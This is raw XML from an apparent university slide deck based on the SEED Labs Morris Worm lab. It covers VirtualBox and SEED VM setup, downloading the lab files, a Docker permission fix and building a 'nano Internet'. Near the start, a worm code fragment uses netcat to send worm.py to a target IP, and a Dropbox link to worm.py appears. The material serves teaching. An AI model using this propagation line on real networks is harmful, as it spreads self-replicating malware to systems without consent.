              <a:t>([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>f"nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> -w3 {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>targetIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>} 9999 &lt; worm.py"], shell=True)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315350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418278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dirty="0"/>
              <a:t>https://seedsecuritylabs.org/labsetup.html</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94281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300352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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://seedsecuritylabs.org/Labs_20.04/Files/Morris_Worm/Labsetup.zip --no-check-certificate</a:t>
            </a:r>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91267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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Labsetup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/internet-nano/</a:t>
            </a:r>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190183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rPr>
              <a:t>debug: Docker permission denied</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Something to do with docker. Here is the solution ( add a student account to the ducker group).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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/pelias/docker/issues/230</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/48957195/how-to-fix-docker-got-permission-denied-issue/48957722#48957722</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="DengXia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171156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http://localhost:8080/map.html</a:t>
            </a:r>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187205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icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1.2.3.4</a:t>
            </a:r>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51656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65410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21.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><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4.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><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7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11.xml"/><Relationship Id="rId19"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customXml" Target="../ink/ink13.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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customXml" Target="../ink/ink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customXml" Target="../ink/ink23.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><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customXml" Target="../ink/ink22.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId22"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customXml" Target="../ink/ink29.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ustomXml" Target="../ink/ink31.xml"/><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93.png"/><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customXml" Target="../ink/ink3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33.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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customXml" Target="../ink/ink37.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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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customXml" Target="../ink/ink39.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customXml" Target="../ink/ink45.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId20"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customXml" Target="../ink/ink44.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink48.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.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dropbox.com/s/phghmrp8sc0r3pf/worm.py"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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Morris Worm Attack</a:t>
            </a:r>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Developed based on  https://seedsecuritylabs.org/Labs_20.04/Networking/Morris_Worm/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23848793-1268-A8F6-B9C9-B01BF6297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0" y="0"/>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182BA-218E-0F95-D25A-693B367CEB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1297746"/>
            <a:ext cx="7993254" cy="5319094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7745348-1AE1-77BF-6DE2-497CEBB384D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5170322" y="4093255"/>
            <a:ext cx="844510"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76C5BD-49BB-1B74-1EE0-B05E228769DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="928414"/>
            <a:ext cx="1558089" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extract zip file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218405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C7400C-5A5E-AC4D-2B8D-1583D1D6B5DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="45862"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939186" y="1609478"/>
            <a:ext cx="10160176" cy="4120762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5FCF8E7-1632-3F0E-1090-EECFB0ECC00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6558780" y="2476588"/>
            <a:ext cx="0" cy="569068"/>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6F520E-33C8-F3DC-58BB-2D22F27A4901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939186" y="1240146"/>
            <a:ext cx="3688961" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Oracle VM VirtualBox Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356084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E7024-3019-39A7-F838-4815E7C7D8CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783124" y="0"/>
            <a:ext cx="8323546" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CAB478-3349-9E5F-38BD-7BA51D418C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863402" y="4646027"/>
            <a:ext cx="692887"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988F066-C22C-3F33-6CC1-C6DB0A00BC2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10300785" y="4270550"/>
            <a:ext cx="0" cy="445816"/>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3236D1-1B02-C664-A7D8-06436137B193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7869085" y="6777953"/>
            <a:ext cx="631821"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6F797F-AE69-D863-3237-C0BA7A4F7F12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9912160" y="4303768"/>
            <a:ext cx="592853" cy="379380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA34CF3F-753C-F3DB-BA49-EDA56A83C1CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8569922" y="6588263"/>
            <a:ext cx="592853" cy="379380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB71C68-4A7F-3E9B-A4C0-F78FEC5476DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383624" y="923558"/>
            <a:ext cx="3273510" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1: Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Use an existing virtual hard disk file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>folder icon to browse files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3: Point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>SEED-Ubuntu20.04.vdi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4: Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Finish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4CCF03-EB7E-CB41-7BF2-76E29CD24BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4579809" y="4456337"/>
            <a:ext cx="592853" cy="379380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ED1CF8-109F-6627-D581-B006BFD47188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063529" y="2348917"/>
            <a:ext cx="679510" cy="1342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35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2B6B2-0E8D-6F91-4AB2-D7E7A1783A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="50594"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074395" y="1825787"/>
            <a:ext cx="9389366" cy="3490905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAA2648-3471-1A17-EC09-3F813F866F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6096000" y="2635687"/>
            <a:ext cx="764124"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69D719-ECED-9A2D-2BC6-88FB741D920C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381508" y="3835795"/>
            <a:ext cx="692887"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1C1DA28-281A-4F87-9004-CD019952925F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074395" y="1356642"/>
            <a:ext cx="2318510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click start to launch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427284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C4F7D-C67C-ABEA-022E-6AD4D1A8DF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2959104" y="1223386"/>
            <a:ext cx="6081287" cy="5197290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125926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DFE2D-F513-9FDA-E808-7FDF61BD678E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hands-on Lab (2): Build a nano Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3EF985-1A6A-8597-E70B-89602470E6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130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3E0D09B3-559F-6610-8F17-7E31A656BE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7676806" y="2799951"/>
            <a:ext cx="4359044" cy="329928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5ECA2BA-4DF3-7A72-6A80-F7E00D4176C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
